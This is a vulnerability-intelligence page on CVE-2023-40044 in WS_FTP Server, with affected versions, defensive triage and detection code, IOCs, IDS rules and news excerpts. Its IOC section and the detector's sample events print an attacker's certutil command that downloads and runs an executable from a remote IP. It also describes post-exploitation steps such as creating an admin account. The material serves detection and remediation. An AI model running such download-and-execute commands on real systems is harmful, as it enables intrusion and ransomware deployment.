CVE-2023-40044
Published 2023-09-27
Priority P1 · 98 · high · CVSS 3.1: 8.8
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT · Ransomware
CISA Known Exploited Vulnerability, due 2023-10-26
Exploited in the wild
EPSS: 90.15% (99.8th percentile)
In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a pre-authenticated attacker could leverage a .NET deserialization vulnerability in the Ad Hoc Transfer module to execute remote commands on the underlying WS_FTP Server operating system.
Affected (4 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| progress | ws_ftp_server | < 8.7.4 | 8.7.4 |
| progress | ws_ftp_server | >= 8.8 < 8.8.2 | 8.8.2 |
| progress_software_corporation | ws_ftp_server | >= 8.7.0 < 8.7.4 | 8.7.4 |
| progress_software_corporation | ws_ftp_server | >= 8.8.0 < 8.8.2 | 8.8.2 |
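Added example (not code from the page's sources or from Progress): a version triage helper that encodes the four affected ranges in the table above and, for inventory work, extracts the version from a WS_FTP 220 greeting of the kind the Emerging Threats banner rule on this page inspects. The banner shape and the sample greetings are assumptions/constructed; a banner check only flags candidates, and the page's remediation note still applies: only a full-installer upgrade to 8.7.4 or 8.8.2 closes the issue.

```python
"""Version triage for CVE-2023-40044 against the affected ranges above.

Added example, not from the page's sources: parses a WS_FTP Server version
string (or the version embedded in an FTP 220 banner) and decides whether it
falls inside a vulnerable range. Sample banners below are constructed.
"""
import re
from typing import Optional, Tuple

Version = Tuple[int, int, int]

# Fixed versions per the affected table: 8.7.4 closes the 8.7 line (and
# every earlier 8.x build, since the first range is simply '< 8.7.4');
# 8.8.2 closes the 8.8 line.
FIXED_87: Version = (8, 7, 4)
FIXED_88_START: Version = (8, 8, 0)
FIXED_88: Version = (8, 8, 2)

# Assumed banner shape: "220 WS_FTP Server 8.7.3 (...)". The version may
# carry 2 or 3 components; missing components are treated as zero.
_BANNER_RE = re.compile(r"^220[ -].*?WS_FTP Server (\d+(?:\.\d+){1,2})")
_VERSION_RE = re.compile(r"^\d+(?:\.\d+){1,3}$")


def parse_version(text: str) -> Version:
    """Turn '8.7.3' or '8.8' into a comparable (major, minor, patch) tuple."""
    text = text.strip()
    if not _VERSION_RE.match(text):
        raise ValueError(f"not a dotted version: {text!r}")
    parts = [int(p) for p in text.split(".")]
    parts += [0] * (3 - len(parts))
    return (parts[0], parts[1], parts[2])


def is_vulnerable(version: str) -> bool:
    """True if the version falls inside one of the affected ranges."""
    v = parse_version(version)
    if v < FIXED_87:                        # '< 8.7.4', including 8.0 to 8.6
        return True
    return FIXED_88_START <= v < FIXED_88   # '>= 8.8.0 < 8.8.2'


def banner_version(banner: str) -> Optional[str]:
    """Extract the version from a WS_FTP 220 greeting, or None if absent."""
    m = _BANNER_RE.match(banner)
    return m.group(1) if m else None


def triage_banner(banner: str) -> str:
    """Classify a greeting as 'vulnerable', 'patched' or 'unknown'."""
    ver = banner_version(banner)
    if ver is None:
        return "unknown"      # not a WS_FTP banner, or version hidden
    return "vulnerable" if is_vulnerable(ver) else "patched"


if __name__ == "__main__":
    # Constructed sample greetings, not captured from any real host.
    samples = [
        "220 WS_FTP Server 8.7.3 (1234567890)",
        "220 WS_FTP Server 8.8.1 (1234567890)",
        "220 WS_FTP Server 8.8.2 (1234567890)",
        "220 WS_FTP Server 8.6.0 (1234567890)",
        "220 ProFTPD Server ready.",
    ]
    for s in samples:
        print(f"{triage_banner(s):10s} {s}")
```

The comparison is done on integer tuples rather than with a regular expression so that boundary builds (8.7.4 exactly, 8.8.0, a hypothetical 8.9) are classified by the table's semantics instead of by alternation precedence.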
Detection & IOCs (extracted from sources)
command: /c certutil -urlcache -f hxxp://103[.]163[.]187[.]12:8080/{22-length-alphanumeric-string} %TEMP%\{10-length-alpha-string}.exe & start /B %TEMP%\{same-10-length-alpha-string}.exe
sigma:
endpoint.os = 'windows' AND event.category = 'process' AND src.process.name in:anycase ('w3wp.exe') AND src.process.cmdline contains 'WSFTPSVR_WTM' AND tgt.process.cmdline contains ('certutil', 'mshta', 'powershell', 'pwsh', 'cmd', 'curl', 'wmic', 'nslookup', 'ping', 'whoami')
- Post-exploitation Attack Chain 1: w3wp.exe (WSFTPSVR_WTM) spawns PowerShell that decodes a Base64/Gzip payload, then uses certutil with -urlcache -f to download and execute a payload from an IP-literal URL on port 8080.
- Post-exploitation Attack Chain 2: w3wp.exe spawns curl to download cl.exe from attacker-controlled infrastructure, then executes it. Also uses tmpfiles.org and oastify.com (Burp Collaborator) domains for payload delivery and OOB callback.
- Post-exploitation Attack Chain 3: Attacker drops executables (n1.exe, n2.exe, s.exe, xmpp.exe, ft.exe) to C:\ProgramData, creates a local admin account named 'temp' with password 'p@ssw0rd123', and uses nslookup for OOB DNS callbacks to oastify.com subdomains.
- Rapid7 observed the same Burp Suite (oastify.com) domain used across all incidents, suggesting a single threat actor or shared tooling. Oastify.com subdomains in DNS/network logs are a strong indicator of exploitation activity.
- The process execution chain is consistent across all observed exploitation instances, indicating likely mass exploitation. The parent process is always w3wp.exe with the WSFTPSVR_WTM application pool.
- Ransomware actors used the open-source GodPotato tool for privilege escalation to NT AUTHORITY\SYSTEM after exploiting CVE-2023-40044. Monitor for GodPotato execution following w3wp.exe activity.
- Approximately 2,900 WS_FTP hosts were internet-exposed with their webserver accessible at time of disclosure; exploitation requires the webserver component to be reachable.
- The only complete remediation is upgrading to WS_FTP Server 8.7.4 or 8.8.2 using the full installer; partial updates are insufficient.
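Added example, not a rule shipped by SentinelOne, Rapid7 or Huntress: the detection query quoted above, re-implemented over constructed Windows process events so its conditions (parent w3wp.exe, parent command line carrying WSFTPSVR_WTM, child among the listed living-off-the-land binaries) can be exercised offline. It tightens the published `contains` match by looking at the child's executable name rather than the whole command line, and adds a second, higher-confidence tag when the child command line matches the certutil `-urlcache -f` download from an IP-literal URL described in Attack Chain 1. Event field names and all sample events are assumptions/constructed; the IP used is from the documentation range.

```python
"""Process-spawn detection for the w3wp.exe (WSFTPSVR_WTM) chain above.

Added example, not a vendor rule. Re-implements the published query over
constructed process events (field names are assumed) and adds a tag for
the certutil IP-literal download pattern from Attack Chain 1.
"""
import re
from typing import Dict, List, Tuple

# Living-off-the-land binaries named in the published query.
SUSPICIOUS_CHILDREN = {
    "certutil", "mshta", "powershell", "pwsh", "cmd", "curl",
    "wmic", "nslookup", "ping", "whoami",
}
PARENT_IMAGE = "w3wp.exe"
PARENT_POOL_MARKER = "WSFTPSVR_WTM"   # Ad Hoc Transfer application pool

# certutil ... -urlcache ... -f http(s)://<ip-literal>[:port]/...
_CERTUTIL_IPURL = re.compile(
    r"certutil(?:\.exe)?\s.*-urlcache\s.*-f\s+https?://"
    r"\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/",
    re.IGNORECASE,
)


def child_binary(cmdline: str) -> str:
    """Lower-cased basename (without .exe) of the executable in a command line.

    Matching the first token instead of the whole string avoids substring
    hits such as 'ping' inside a binary called 'mapping.exe'.
    """
    s = cmdline.strip()
    if not s:
        return ""
    if s.startswith('"') and '"' in s[1:]:        # quoted path with spaces
        first = s[1:s.index('"', 1)]
    else:
        first = s.split()[0]
    base = first.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return base[:-4] if base.endswith(".exe") else base


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return detection tags for one process event; [] means no match."""
    tags: List[str] = []
    if event.get("os") != "windows" or event.get("category") != "process":
        return tags
    parent = event.get("parent_name", "").lower()
    if parent != PARENT_IMAGE or PARENT_POOL_MARKER not in event.get("parent_cmdline", ""):
        return tags
    child_cmd = event.get("cmdline", "")
    if child_binary(child_cmd) in SUSPICIOUS_CHILDREN:
        tags.append("ws_ftp_w3wp_spawns_lolbin")
        if _CERTUTIL_IPURL.search(child_cmd):
            tags.append("certutil_ip_literal_download")
    return tags


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Run evaluate() over a batch and keep only the events that matched."""
    hits = []
    for e in events:
        tags = evaluate(e)
        if tags:
            hits.append((e["id"], tags))
    return hits


# Constructed sample telemetry (not captured from any real incident).
W3WP_WTM = r'c:\windows\system32\inetsrv\w3wp.exe -ap "WSFTPSVR_WTM" -v "v4.0"'
W3WP_OTHER = r'c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v4.0"'
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"id": "e1", "os": "windows", "category": "process",
     "parent_name": "w3wp.exe", "parent_cmdline": W3WP_WTM,
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c certutil -urlcache -f '
                r'http://192.0.2.10:8080/abcdef %TEMP%\qwerty.exe & start /B %TEMP%\qwerty.exe'},
    {"id": "e2", "os": "windows", "category": "process",
     "parent_name": "W3WP.EXE", "parent_cmdline": W3WP_WTM,
     "cmdline": r"nslookup example.oastify.com"},
    {"id": "e3", "os": "windows", "category": "process",
     "parent_name": "w3wp.exe", "parent_cmdline": W3WP_OTHER,
     "cmdline": r"powershell -nop -c whoami"},
    {"id": "e4", "os": "windows", "category": "process",
     "parent_name": "explorer.exe", "parent_cmdline": r"C:\Windows\explorer.exe",
     "cmdline": r"cmd.exe /c dir"},
    {"id": "e5", "os": "windows", "category": "process",
     "parent_name": "w3wp.exe", "parent_cmdline": W3WP_WTM,
     "cmdline": r'"C:\Program Files\Ipswitch\mapping.exe" /refresh'},
]

if __name__ == "__main__":
    for event_id, tags in scan(SAMPLE_EVENTS):
        print(event_id, ", ".join(tags))
```

Event e3 shows why the application-pool marker matters: the same w3wp.exe image serving another pool is not evidence of this chain, and e5 shows the false positive the first-token match avoids.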
CVSS provenance
- nvd (v3.1): 8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- vulncheck: 10.0 CRITICAL
- cisa: 8.8 HIGH
GHSA
GHSA-29vf-j74g-gmfc: In WS_FTP Server version 8
ghsa_unreviewed · 2023-09-27
CVE-2023-40044 [HIGH] CWE-502 GHSA-29vf-j74g-gmfc: In WS_FTP Server version 8
In WS_FTP Server version 8.7.0 prior to 8.7.4 and version 8.8.0 prior to 8.8.2, a pre-authenticated attacker could leverage a .NET deserialization vulnerability in the Ad Hoc Transfer module to execute remote commands on the underlying WS_FTP Server operating system.
VulnCheck
Progress WS_FTP Server Deserialization of Untrusted Data Vulnerability
vulncheck·2023·CVSS 10.0
CVE-2023-40044 [CRITICAL] CWE-502 Progress WS_FTP Server Deserialization of Untrusted Data Vulnerability
Progress WS_FTP Server Deserialization of Untrusted Data Vulnerability
Progress WS_FTP Server contains a deserialization of untrusted data vulnerability in the Ad Hoc Transfer module that allows an authenticated attacker to execute remote commands on the underlying operating system.
Affected: Progress WS_FTP Server
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.rapid7.com/blog/post/2023/09/29/etr-critical-vulnerabilities-in-ws_ftp-server/; https://www.huntress.com/blog/critical-vulnerabilities-ws-ftp-exploitation; https://cyberplace.social/@GossiTheDog/111170422410590021; https://www.cisa.gov/sites/default/files/feeds/known_exploited_v
CISA
Progress WS_FTP Server Deserialization of Untrusted Data Vulnerability
cisa·2023-10-05·CVSS 8.8
CVE-2023-40044 [HIGH] CWE-502 Progress WS_FTP Server Deserialization of Untrusted Data Vulnerability
Vulnerability: Progress WS_FTP Server Deserialization of Untrusted Data Vulnerability
Affected: Progress WS_FTP Server
Progress WS_FTP Server contains a deserialization of untrusted data vulnerability in the Ad Hoc Transfer module that allows an authenticated attacker to execute remote commands on the underlying operating system.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023; https://nvd.nist.gov/vuln/detail/CVE-2023-40044
Remediation Due Date: 2023-10-26
Suricata
ET FTP Vulnerable WS_FTP Version in FTP Banner Response (CVE-2023-40044)
suricata·2023-10-05·CVSS 10.0
CVE-2023-40044 [CRITICAL] ET FTP Vulnerable WS_FTP Version in FTP Banner Response (CVE-2023-40044)
ET FTP Vulnerable WS_FTP Version in FTP Banner Response (CVE-2023-40044)
Rule: alert tcp-pkt $HOME_NET [21,990,2100,2121,3535] -> any any (msg:"ET FTP Vulnerable WS_FTP Version in FTP Banner Response (CVE-2023-40044)"; flow:established,to_client; content:"220"; startswith; content:"WS_FTP|20|Server|20|"; fast_pattern; distance:0; pcre:"/^(8\.7\.[0-3])|(8\.[0-6]\.\d{1,})|(8\.8\.[0-1])(?:$|\x28)/R"; threshold: type limit, track by_src, seconds 3600, count 1; reference:url,www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044; reference:cve,2023-40044; classtype:network-scan; sid:2048464; rev:3; metadata:affected_product WS_FTP, attack_target FTP_Server, created_at 2023_10_05, cve CVE_2023_40044, deployment Perimeter, deployment Internal, perfo
Suricata
ET EXPLOIT WS_FTP .NET Deserialization Exploit Attempt (CVE-2023-40044)
suricata·2023-10-03·CVSS 10.0
CVE-2023-40044 [CRITICAL] ET EXPLOIT WS_FTP .NET Deserialization Exploit Attempt (CVE-2023-40044)
ET EXPLOIT WS_FTP .NET Deserialization Exploit Attempt (CVE-2023-40044)
Rule: alert http $EXTERNAL_NET any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT WS_FTP .NET Deserialization Exploit Attempt (CVE-2023-40044)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/AHT/AhtApiService.asmx/AuthUser"; fast_pattern; http.content_type; content:"multipart/form-data|3b|"; startswith; http.request_body; content:"Content-Disposition|3a 20|form-data|3b 20|name|3d|"; content:!"|3b 20|filename|3d|"; within:400; reference:cve,2023-40044; reference:url,www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044; classtype:attempted-admin; sid:2048383; rev:1; metadata:affected_product WS_FTP, attack_target FTP_Server, created_at 20
Metasploit
Progress Software WS_FTP Unauthenticated Remote Code Execution
metasploit
Progress Software WS_FTP Unauthenticated Remote Code Execution
Progress Software WS_FTP Unauthenticated Remote Code Execution
This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP Server prior to 2020.0.4 (version 8.7.4) and 2022.0.2 (version 8.8.2) are vulnerable to this issue. The vulnerability was originally discovered by AssetNote.
Nuclei
WS_FTP Server - Insecure Deserialization
nuclei·CVSS 8.8
CVE-2023-40044 [HIGH] WS_FTP Server - Insecure Deserialization
WS_FTP Server - Insecure Deserialization
In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a pre-authenticated attacker could leverage a .NET deserialization vulnerability in the Ad Hoc Transfer module to execute remote commands on the underlying WS_FTP Server operating system.
Template:
id: CVE-2023-40044
info:
  name: WS_FTP Server - Insecure Deserialization
  author: 0x_Akoko
  severity: critical
  description: |
    In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a pre-authenticated attacker could leverage a .NET deserialization vulnerability in the Ad Hoc Transfer module to execute remote commands on the underlying WS_FTP Server operating system.
  impact: |
    Unauthenticated attackers can exploit .NET deserialization vulnerability in the Ad Hoc Transfer module to execute arbitrary commands
Wiz
Crying Out Cloud - November Newsletter | Wiz
blogs_wiz·2023-11-01·CVSS 9.8
CVE-2023-42115 [CRITICAL] Crying Out Cloud - November Newsletter | Wiz
The past month has brought a series of vulnerabilities and security incidents that have left users affected. Amidst the noise, we've taken it upon ourselves to curate the most significant developments for you.
Here are our top picks of cloud security highlights!
## 🐞 High Profile Vulnerabilities
## Critical and high severity 0day vulnerabilities in Exim
Multiple vulnerabilities were disclosed in Exim Mail Transfer Agent (MTA), including CVE-2023-42115, which is a critical vulnerability enabling unauthenticated attackers to remotely execute code on publicly exposed Exim servers with a specific non-default configuration. This issue results from improper input validation that leads to writing arbitrary code past the end of the buffer.
According to Wiz data, although Exim is very prevalen
Bleepingcomputer
Ransomware attacks now target unpatched WS_FTP servers
blogs_bleepingcomputer·2023-10-12·CVSS 10.0
[CRITICAL] Ransomware attacks now target unpatched WS_FTP servers
## Ransomware attacks now target unpatched WS_FTP servers
## Sergiu Gatlan
Internet-exposed WS_FTP servers unpatched against a maximum severity vulnerability are now targeted in ransomware attacks.
As recently observed by Sophos X-Ops incident responders, threat actors self-described as the Reichsadler Cybercrime Group attempted, unsuccessfully, to deploy ransomware payloads created using a LockBit 3.0 builder stolen in September 2022.
"The ransomware actors didn't wait long to abuse the recently reported vulnerability in WS_FTP Server software," Sophos X-Ops said.
"Even though Progress Software released a fix for this vulnerability in September 2023, not all of the servers have been patched. Sophos X-Ops observed unsuccessful attempts to deploy ransomware through the unpatched servi
Sentinelone
Threat Actors Actively Exploiting Progress WS_FTP via Multiple Attack Chains
blogs_sentinelone·2023-10-09·CVSS 10.0
CVE-2023-40044 [CRITICAL] Threat Actors Actively Exploiting Progress WS_FTP via Multiple Attack Chains
Starting on September 30, 2023, SentinelOne has observed actors exploiting the recently disclosed flaws in Progress’ WS_FTP against Windows servers running a vulnerable version of the software. The two highest severity vulnerabilities–CVE-2023-40044 and CVE-2023-42657–were assigned a CVSS score of 10 and 9.9, respectively. We observed at least three types of multi-stage attack chains, which begin with exploitation, and then commands to download a payload from a remote server, often via an IP-literal URL.
This active, in-the-wild exploitation marks the third wave of attacks against a Progress Software product in 2023. While exploitation is likely opportunistic, organizations in the Information Technology Managed Service Provider (IT MSP), Software and Technology, Legal Services, Engineeri
Talos
Is it bad to have a major security incident on your résumé? (Seriously I don’t know)
blogs_talos·2023-10-05
Is it bad to have a major security incident on your résumé? (Seriously I don’t know)
Welcome to this week’s edition of the Threat Source newsletter.
It’s Cybersecurity Awareness Month, which means it’s time to hug your nearest defender — they’re probably tired, could be facing burnout or just have had too much coffee today.
What makes the cybersecurity landscape even more fraught right now is that qualified analysts, researchers and security practitioners are having a hard time finding work. Several major security firms have recently experienced layoffs or have shut down entirely, at the same time the community is lamenting about a cybersecurity skills gap and a lack of workers.
I was watching TechCrunch’s “Disrupt” conference last week and I found it interesting that one particular panel was discussing the challenges of hiring in cybersecurity right now, and the host o
Tenable
CVE-2023-40044, CVE-2023-42657: Progress Software Patches Multiple Vulnerabilities in WS_FTP Server
blogs_tenable·2023-10-02·CVSS 10.0
[CRITICAL] CVE-2023-40044, CVE-2023-42657: Progress Software Patches Multiple Vulnerabilities in WS_FTP Server
Huntress
Critical Vulnerabilities: WS_FTP Exploitation | Huntress
blogs_huntress·2023-10-02·CVSS 6.1
CVE-2023-40044 [MEDIUM] Critical Vulnerabilities: WS_FTP Exploitation | Huntress
On Thursday, September 28, 2023, software vendor Progress released a security advisory for numerous vulnerabilities affecting the WS_FTP Server Ad Hoc Transfer Module within their WS_FTP software.
These vulnerabilities were disclosed as:
- CVE-2023-40044 (CVSS: 10)
- CVE-2023-42657 (CVSS 9.9)
- CVE-2023-40045 (CVSS 8.3)
- CVE-2023-40046 (CVSS 8.2)
- CVE-2023-40048 (CVSS 6.8)
- CVE-2022-27665 (CVSS 6.1)
- CVE-2023-40049 (CVSS 5.3)
Most notable amongst these were CVE-2023-40044 and CVE-2023-42657, both critical severity issues. Throughout this past weekend, the cybersecurity industry has been chasing CVE-2023-40044 specifically.
## What We Know So Far
As disclosed by Progress, CVE-2023-40044 is the critical (CVSS: 10) remote code execution vulnerability that does not require authentication.
F
Bleepingcomputer
Exploit available for critical WS_FTP bug exploited in attacks
blogs_bleepingcomputer·2023-10-02·CVSS 10.0
CVE-2023-40044 [CRITICAL] Exploit available for critical WS_FTP bug exploited in attacks
## Exploit available for critical WS_FTP bug exploited in attacks
## Sergiu Gatlan
Over the weekend, security researchers released a proof-of-concept (PoC) exploit for a maximum severity remote code execution vulnerability in Progress Software's WS_FTP Server file sharing platform.
Assetnote researchers who discovered and reported the maximum severity flaw (CVE-2023-40044) published a blog post with a PoC exploit and additional technical details on Saturday.
CVE-2023-40044 is caused by a .NET deserialization vulnerability in the Ad Hoc Transfer Module, allowing unauthenticated attackers to remotely execute commands on the underlying operating system via a simple HTTP request.
"This vulnerability turned out to be relatively straight forward and represented a typical .NET deserializat
Checkpoint
2nd October – Threat Intelligence Report
blogs_checkpoint·2023-10-02
CVE-2023-5217 2nd October – Threat Intelligence Report
## 2nd October – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 2nd October, please download our Threat_Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Check Point researchers have detected a phishing campaign exploiting popular file-sharing program Dropbox. The threat actors use legitimate Dropbox pages to send official email messages to the victims, which will then redirect the recipients to credential stealing pages.
Japanese entertainment giant Sony, as well as major
Bleepingcomputer
Progress warns of maximum severity WS_FTP Server vulnerability
blogs_bleepingcomputer·2023-09-28·CVSS 10.0
[CRITICAL] Progress warns of maximum severity WS_FTP Server vulnerability
## Progress warns of maximum severity WS_FTP Server vulnerability
## Sergiu Gatlan
Progress Software, the maker of the MOVEit Transfer file-sharing platform recently exploited in widespread data theft attacks, warned customers to patch a maximum severity vulnerability in its WS_FTP Server software.
The company says thousands of IT teams worldwide use its enterprise-grade WS_FTP Server secure file transfer software.
In an advisory published on Wednesday, Progress disclosed multiple vulnerabilities impacting the software's manager interface and Ad hoc Transfer Module.
Out of all WS_FTP Server security flaws patched this week, two of them were rated as critical, with the one tracked as CVE-2023-40044 receiving a maximum 10/10 severity rating and allowing unauthenticated attackers to exec
References
- http://packetstormsecurity.com/files/174917/Progress-Software-WS_FTP-Unauthenticated-Remote-Code-Execution.html
- https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044
- https://censys.com/cve-2023-40044/
- https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023
- https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044
- https://www.progress.com/ws_ftp
- https://www.rapid7.com/blog/post/2023/09/29/etr-critical-vulnerabilities-in-ws_ftp-server/
- https://www.theregister.com/2023/10/02/ws_ftp_update/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-40044
Timeline
- 2023-09-27: Published
- 2023-10-05: Added to CISA KEV
- Exploited in the wild